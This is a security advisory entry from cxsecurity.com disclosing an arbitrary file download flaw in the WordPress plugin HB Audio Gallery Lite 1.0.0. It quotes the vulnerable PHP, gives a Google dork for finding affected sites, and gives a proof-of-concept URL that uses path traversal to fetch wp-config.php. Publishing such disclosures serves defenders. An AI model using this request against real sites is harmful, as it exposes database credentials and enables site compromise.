WordPress HB Audio Gallery Lite 1.0.0 Arbitrary File Download

2016.03.23
Credit: CrashBandicot
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-200
Dork: inurl:/wp-content/plugins/hb-audio-gallery-lite

# Exploit Title: Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Download # Exploit Author: CrashBandicot # Date: 2016-03-22 # Google Dork : inurl:/wp-content/plugins/hb-audio-gallery-lite # Vendor Homepage: https://fr.wordpress.org/plugins/hb-audio-gallery-lite/ # Tested on: MSWin32 # Version: 1.0.0 # Vuln file : gallery/audio-download.php 11. if( $_REQUEST['file_size'] && $_REQUEST['file_path'] ) { 13. $file_size = $_REQUEST['file_size']; 15. $file = $_REQUEST['file_path']; 17. $filename = basename($file); .... 55. Header("Content-Disposition: attachment; filename='" . $filename . "'"); # PoC : /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10 # 22/03/2016 - Informed Vendor about Issue


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top